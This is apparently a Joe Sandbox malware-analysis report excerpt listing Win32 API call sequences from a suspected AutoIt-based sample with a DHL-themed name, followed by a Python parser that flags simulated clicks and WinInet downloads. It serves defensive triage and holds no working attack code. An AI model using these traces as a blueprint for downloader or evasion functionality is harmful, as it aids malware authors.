                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: MessageSend$_wcslen$ClassName
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 2081771294-1403004172
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 000C4705
                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 000C4713
                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 000C471A
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                      • String ID: msctls_updown32$p]
                                                                                      • API String ID: 4014797782-2327732127
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 000C2F8D
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 000C2F94
                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 000C2FA9
                                                                                      • DestroyWindow.USER32(?), ref: 000C2FB1
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                      • String ID: SysAnimate32
                                                                                      • API String ID: 3529120543-1011021900
                                                                                      APIs
                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                      • GetCursorPos.USER32(?), ref: 000C9001
                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00087711,?,?,?,?,?), ref: 000C9016
                                                                                      • GetCursorPos.USER32(?), ref: 000C905E
                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00087711,?,?,?), ref: 000C9094
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                      • String ID: p]
                                                                                      • API String ID: 2864067406-1923361398
                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00054D1E,000628E9,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002), ref: 00054D8D
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00054DA0
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00054D1E,000628E9,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002,00000000), ref: 00054DC3
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32 ref: 0008D3AD
                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0008D3BF
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0008D3E5
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                                                      • API String ID: 145871493-2590602151
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E9C
                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00034EAE
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034EC0
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                      • API String ID: 145871493-3689287502
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E62
                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00034E74
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E87
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                      • API String ID: 145871493-1355242751
                                                                                      APIs
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000A2C05
                                                                                      • DeleteFileW.KERNEL32(?), ref: 000A2C87
                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000A2C9D
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000A2CAE
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000A2CC0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Delete$Copy
                                                                                      • String ID:
                                                                                      • API String ID: 3226157194-0
                                                                                      • Opcode ID: fc95fb687aaa467f10bddac81de230d12de13ffdb9fc4a19c30d23934133bbdd
                                                                                      • Instruction ID: 44bbc15a8ef6fa58dec5c0ca6bdba68796d5ead040726d42f86482692e384646
• Instruction Fuzzy Hash: 5EB15D71900119ABDF25DBE8CC85EDEB7BDEF49350F1040A6FA09E6152EB319A448F61
APIs
• GetCurrentProcessId.KERNEL32 ref: 000BA427
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 000BA435
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 000BA468
• CloseHandle.KERNEL32(?), ref: 000BA63D
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
• Opcode ID: 84d452792a690b695d6992e17e016b56910cf8f38e85aff711c9fbddf6fe9a0f
• Instruction ID: 0c39c7852a2acdb076bb9b887cc3dce990163d1f5a8053a072280e3559fd9a72
• Instruction Fuzzy Hash: A0A1A2B1604701AFE720DF24C886F6AB7E5AF84714F14881DF69ADB392D770ED418B92
APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,000D3700), ref: 0006BB91
• WideCharToMultiByte.KERNEL32(00000000,00000000,0010121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0006BC09
• WideCharToMultiByte.KERNEL32(00000000,00000000,00101270,000000FF,?,0000003F,00000000,?), ref: 0006BC36
• _free.LIBCMT ref: 0006BB7F
  • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
  • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
• _free.LIBCMT ref: 0006BD4B
Similarity
• API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 1286116820-0
• Opcode ID: 79d47e4ddf8b71e286c5fd14da9104088c0625032a4f378241879e1395d84114
• Instruction ID: d39894f3010eb33122d0f62e9c0b97f992a288ae6d17b471eacd4a87b7ac39e2
• Instruction Fuzzy Hash: 2351D8B1900219AFDB20DF65DC819AEB7FAEF40360B10426AE554D7292EB749FC18B50
APIs
  • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0009CF22,?), ref: 0009DDFD
  • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0009CF22,?), ref: 0009DE16
  • Part of subcall function 0009E199: GetFileAttributesW.KERNEL32(?,0009CF95), ref: 0009E19A
• lstrcmpiW.KERNEL32(?,?), ref: 0009E473
• MoveFileW.KERNEL32(?,?), ref: 0009E4AC
• _wcslen.LIBCMT ref: 0009E5EB
• _wcslen.LIBCMT ref: 0009E603
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0009E650
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
• Opcode ID: ca9f9493f9fab2a36793e0b5b765e3d1801730a8766c6cedadec83363495c5e9
• Instruction ID: 9b4d456def73e08312c04bea2c2009a0508a6ba5685c76040a9087bd311efcbe
• Instruction Fuzzy Hash: 1D5151B24083859BDB64DB90D8919DF73ECAF85340F00491EF689D3192EF74A6889766
APIs
  • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
  • Part of subcall function 000BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000BB6AE,?,?), ref: 000BC9B5
  • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BC9F1
  • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA68
  • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BBAA5
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000BBB00
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 000BBB63
• RegCloseKey.ADVAPI32(?,?), ref: 000BBBA6
• RegCloseKey.ADVAPI32(00000000), ref: 000BBBB3
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 826366716-0
• Opcode ID: a9b84867dd1b90dc9eef7f5ba8d0410f89b6bce78e3da367a3249b1f9078358b
• Instruction ID: 5b8a3b6fb320df49dc0649e791a967c818ab36f9f6d24b3c45223a70e69f251f
• Instruction Fuzzy Hash: 7361B231208241EFD714DF14C890EAABBE9FF84308F54855DF4998B2A2DBB1ED45CB92
APIs
• VariantInit.OLEAUT32(?), ref: 00098BCD
• VariantClear.OLEAUT32 ref: 00098C3E
• VariantClear.OLEAUT32 ref: 00098C9D
• VariantClear.OLEAUT32(?), ref: 00098D10
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00098D3B
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
• Opcode ID: fabd1198de1af50a6ca091954a387c7b472c529e0bfcd900005526058945e37d
• Instruction ID: 7e7b9e5f4a6e107aa4bc15f98bd8b17c0405ae819c3ebd72f59a45b93c98794c
• Instruction Fuzzy Hash: 145146B5A01219EFDB14CF68C894EAAB7F8FF89310F158569E909DB350E734E911CB90
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 000A8BAE
• GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 000A8BDA
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 000A8C32
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 000A8C57
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 000A8C5F
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
• Opcode ID: 3c7f884429c1c8dc627d4e0a6b67827719c5bb3a21040c78174c72055d9894cc
• Instruction ID: ee50e44bbc16235a28d303c08a9254758ff4168a8aa626f80e38563f90080a70
• Instruction Fuzzy Hash: 4C515975A00619AFDB15DF65C880EAABBF5FF49314F088058E849AB362CB35ED51CF90
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 000B8F40
• GetProcAddress.KERNEL32(00000000,?), ref: 000B8FD0
• GetProcAddress.KERNEL32(00000000,00000000), ref: 000B8FEC
• GetProcAddress.KERNEL32(00000000,?), ref: 000B9032
• FreeLibrary.KERNEL32(00000000), ref: 000B9052
  • Part of subcall function 0004F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,000A1043,?,7529E610), ref: 0004F6E6
  • Part of subcall function 0004F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0008FA64,00000000,00000000,?,?,000A1043,?,7529E610,?,0008FA64), ref: 0004F70D
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
• String ID:
• API String ID: 666041331-0
• Opcode ID: e89784f938d645c4b687b311ef24550106e1871519d6ac79896685f3b4f7d312
• Instruction ID: 6d05004bf1c1ae1f4aac52dffe36ade55c3aecc79bf02e13a4cf3b08b67a106a
• Instruction Fuzzy Hash: B4513535604205DFCB15EF58C4949EDBBF5FF49314B0880A8E90A9B362DB31ED86CB90
APIs
                                                                                      Similarity
                                                                                      • API ID: _free
                                                                                      • String ID:
                                                                                      • API String ID: 269201875-0
                                                                                      • Opcode ID: 389624b06611f0b3e4b571c9cc54f5a921d94351b84027db2c6c91a2c752d478
                                                                                      • Instruction ID: b9fb26bbc569e532555f41e19d0d21658d7c5ddb18b9564153c95865b5d6d70e
                                                                                      • Opcode Fuzzy Hash: 389624b06611f0b3e4b571c9cc54f5a921d94351b84027db2c6c91a2c752d478
                                                                                      • Instruction Fuzzy Hash: 2A41E472A006049FDB24DF78C981AADB7F6EF89314F154569EA15EB352DB31AD01CB80
APIs
• GetInputState.USER32 ref: 000A38CB
• TranslateAcceleratorW.USER32(?,00000000,?), ref: 000A3922
• TranslateMessage.USER32(?), ref: 000A394B
• DispatchMessageW.USER32(?), ref: 000A3955
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000A3966
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Message$Translate$AcceleratorDispatchInputPeekState
• String ID:
• API String ID: 2256411358-0
• Opcode ID: 92f2932fc2d75a8a87fba7611ebbd7c55c1b9ba5c198474d81bc96b8ea902458
• Instruction ID: 7d5ed7428707f3956824106689c40f10c0da8732824460de69c449ad79d3f374
• Opcode Fuzzy Hash: 92f2932fc2d75a8a87fba7611ebbd7c55c1b9ba5c198474d81bc96b8ea902458
• Instruction Fuzzy Hash: F7319E70904342AEFB75CBA4D848FB737E8AB07304F04456EF4A6865E0E7F89A85CB11
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,000AC21E,00000000), ref: 000ACF38
• InternetReadFile.WININET(?,00000000,?,?), ref: 000ACF6F
• GetLastError.KERNEL32(?,00000000,?,?,?,000AC21E,00000000), ref: 000ACFB4
• SetEvent.KERNEL32(?,?,00000000,?,?,?,000AC21E,00000000), ref: 000ACFC8
• SetEvent.KERNEL32(?,?,00000000,?,?,?,000AC21E,00000000), ref: 000ACFF2
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: EventInternet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 3191363074-0
• Opcode ID: 16b07ba5a658368d6e3bddef3ecd49a7241f4770aca556bdd3d2c0dcf31100a6
• Instruction ID: 2879c64e82f0e4e1a220bf197012da72afc058d9727206169a91b6b402afbd62
• Opcode Fuzzy Hash: 16b07ba5a658368d6e3bddef3ecd49a7241f4770aca556bdd3d2c0dcf31100a6
• Instruction Fuzzy Hash: 9C3169B1A04205AFFB20DFE5C884EABBBF9EB15350B11443EF50AD2111DB30AE41DBA0
APIs
• GetWindowRect.USER32(?,?), ref: 00091915
• PostMessageW.USER32(00000001,00000201,00000001), ref: 000919C1
• Sleep.KERNEL32(00000000,?,?,?), ref: 000919C9
• PostMessageW.USER32(00000001,00000202,00000000), ref: 000919DA
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 000919E2
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: 1d650847a08c5d7d90abdd6d7c2ab61fd7c2ecd22bdb713c91aba44caf9ab38d
• Instruction ID: 7df250e95047360e7a4141d0f38a99e56ce4f24971e6139532908b3118872a86
• Opcode Fuzzy Hash: 1d650847a08c5d7d90abdd6d7c2ab61fd7c2ecd22bdb713c91aba44caf9ab38d
• Instruction Fuzzy Hash: 7031BF71A0021AEFEF10CFA8CD99EDE3BB5EB05315F104229F925A72D1C7709944DB90
APIs
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 000C5745
• SendMessageW.USER32(?,00001074,?,00000001), ref: 000C579D
• _wcslen.LIBCMT ref: 000C57AF
• _wcslen.LIBCMT ref: 000C57BA
• SendMessageW.USER32(?,00001002,00000000,?), ref: 000C5816
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: MessageSend$_wcslen
• String ID:
• API String ID: 763830540-0
• Opcode ID: cb15dff041c471d74227072374fd56f152fc35135770a84b74756b5b96d7861c
• Instruction ID: 9b18677795a20835dc1fb050598198edf5b8e1d67fb11151c0c1d4ac0c69937f
• Opcode Fuzzy Hash: cb15dff041c471d74227072374fd56f152fc35135770a84b74756b5b96d7861c
• Instruction Fuzzy Hash: AC21A5359046189ADB209F60DC85FEE77BCFF04326F10825AE919EA181D770AAC5CF50
APIs
• IsWindow.USER32(00000000), ref: 000B0951
• GetForegroundWindow.USER32 ref: 000B0968
• GetDC.USER32(00000000), ref: 000B09A4
• GetPixel.GDI32(00000000,?,00000003), ref: 000B09B0
• ReleaseDC.USER32(00000000,00000003), ref: 000B09E8
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
• Opcode ID: fc4f8305ba3d7f2dafa8040372f3fdcbb8bab36bf65186407b2fea636b5bd669
• Instruction ID: da7c7aa746daf687b1b0a0a47875d91ce33538217e9213c06134dc2dab66edae
• Opcode Fuzzy Hash: fc4f8305ba3d7f2dafa8040372f3fdcbb8bab36bf65186407b2fea636b5bd669
• Instruction Fuzzy Hash: DC218E35600204AFE714EF65C988EEEBBE9EF49740F048068E84AE7762CB34AC04CB50
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0006CDC6
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0006CDE9
  • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0006CE0F
• _free.LIBCMT ref: 0006CE22
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0006CE31
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: b0d7846289686fdc78b31436ef16b12d4afbe1772f399c04d4d5975a923b0597
• Instruction ID: 67447c03cff0402dd761176dc95f327bb7a83c965d49644fbc945f2587af2601
• Opcode Fuzzy Hash: b0d7846289686fdc78b31436ef16b12d4afbe1772f399c04d4d5975a923b0597
• Instruction Fuzzy Hash: 8A018472A026557F332117B6AC88D7F79BEDFC6BA13190129FD49C7201EA6A8E0191F0
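Each block in this listing is one function recovered from the memory dump, with its Win32 calls in call-site order, the literal arguments IDA could resolve ("?" where it could not), and the "Part of subcall function" lines for calls made inside a callee. When triaging a report of this size it is quicker to turn the blocks into records and let rules find the sequences of interest than to scroll. The following is an added example, not Joe Sandbox's code and not part of the analysed sample: a Python parser for this "APIs" block format that records (API, module, arguments, call-site address, enclosing subcall) per entry, decodes the Msg parameter of Post/SendMessage when it is a literal, and tags two patterns that appear in the entries above: a WM_LBUTTONDOWN/WM_LBUTTONUP pair posted from one function (the GetWindowRect/PostMessageW/Sleep entry, a simulated click) and a function that reads from a WinInet handle. The message table, the rule names and the tag strings are this example's own choices; the sample input is constructed from three entries in the listing above, trimmed to the lines the parser uses.

```python
"""Parse the per-function "APIs" listing of a Joe Sandbox report and tag call
sequences worth a second look. Added example, not Joe Sandbox's own code."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: three entries copied from the listing above, trimmed to the
# lines this parser consumes ("APIs", the call lines, "API ID", "Opcode ID").
SAMPLE_REPORT = """\
APIs
• GetWindowRect.USER32(?,?), ref: 00091915
• PostMessageW.USER32(00000001,00000201,00000001), ref: 000919C1
• Sleep.KERNEL32(00000000,?,?,?), ref: 000919C9
• PostMessageW.USER32(00000001,00000202,00000000), ref: 000919DA
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 000919E2
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
Similarity
• API ID: MessagePostSleep$RectWindow
• Opcode ID: 1d650847a08c5d7d90abdd6d7c2ab61fd7c2ecd22bdb713c91aba44caf9ab38d
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,000AC21E,00000000), ref: 000ACF38
• InternetReadFile.WININET(?,00000000,?,?), ref: 000ACF6F
• GetLastError.KERNEL32(?,00000000,?,?,?,000AC21E,00000000), ref: 000ACFB4
• SetEvent.KERNEL32(?,?,00000000,?,?,?,000AC21E,00000000), ref: 000ACFC8
Similarity
• API ID: EventInternet$AvailableDataErrorFileLastQueryRead
• Opcode ID: 16b07ba5a658368d6e3bddef3ecd49a7241f4770aca556bdd3d2c0dcf31100a6
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0006CDC6
  • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444), ref: 00063852
• _free.LIBCMT ref: 0006CE22
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0006CE31
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• Opcode ID: b0d7846289686fdc78b31436ef16b12d4afbe1772f399c04d4d5975a923b0597
"""

# One call line: optional subcall prefix, Name.MODULE, optional (args), "ref: ADDR".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w$@?]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>API ID|Opcode ID):\s*(?P<val>.*?)\s*$")

# This example's own table: only the message numbers it is sure about are named;
# anything else is reported as a raw number rather than guessed.
WINDOW_MESSAGES = {0x0201: "WM_LBUTTONDOWN", 0x0202: "WM_LBUTTONUP"}
MESSAGE_APIS = {"PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]                    # literal arguments as printed; "?" = unresolved
    ref: int                           # call-site address
    subcall_of: Optional[str] = None   # set when the call happens inside a callee


@dataclass
class FunctionEntry:
    api_id: str = ""
    opcode_id: str = ""
    calls: List[ApiCall] = field(default_factory=list)


def parse_report(text: str) -> List[FunctionEntry]:
    """Split the listing on its "APIs" headings and collect each entry's calls and IDs."""
    entries: List[FunctionEntry] = []
    current: Optional[FunctionEntry] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            current.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), m["sub"]))
            continue
        f = FIELD_RE.match(line)
        if f and f["key"] == "API ID":
            current.api_id = f["val"]
        elif f:
            current.opcode_id = f["val"]
    return entries


def decode_message(call: ApiCall) -> Optional[str]:
    """For Post/SendMessage, name the Msg argument (second parameter) when it is a literal."""
    if call.name not in MESSAGE_APIS or len(call.args) < 2:
        return None
    try:
        msg = int(call.args[1], 16)
    except ValueError:  # "?" or any other non-literal
        return None
    return WINDOW_MESSAGES.get(msg, f"0x{msg:04X}")


def triage(entries: List[FunctionEntry]) -> List[Tuple[str, List[str]]]:
    """Tag a button-down followed by button-up posted from one function, and WinInet reads."""
    findings = []
    for e in entries:
        tags: List[str] = []
        direct = [c for c in e.calls if c.subcall_of is None]
        msgs = [m for m in (decode_message(c) for c in direct) if m]
        if "WM_LBUTTONDOWN" in msgs and "WM_LBUTTONUP" in msgs[msgs.index("WM_LBUTTONDOWN"):]:
            tags.append("synthetic-mouse-click")
        if any(c.module == "WININET" and c.name == "InternetReadFile" for c in e.calls):
            tags.append("wininet-download")
        findings.append((e.api_id, tags))
    return findings


if __name__ == "__main__":
    for api_id, tags in triage(parse_report(SAMPLE_REPORT)):
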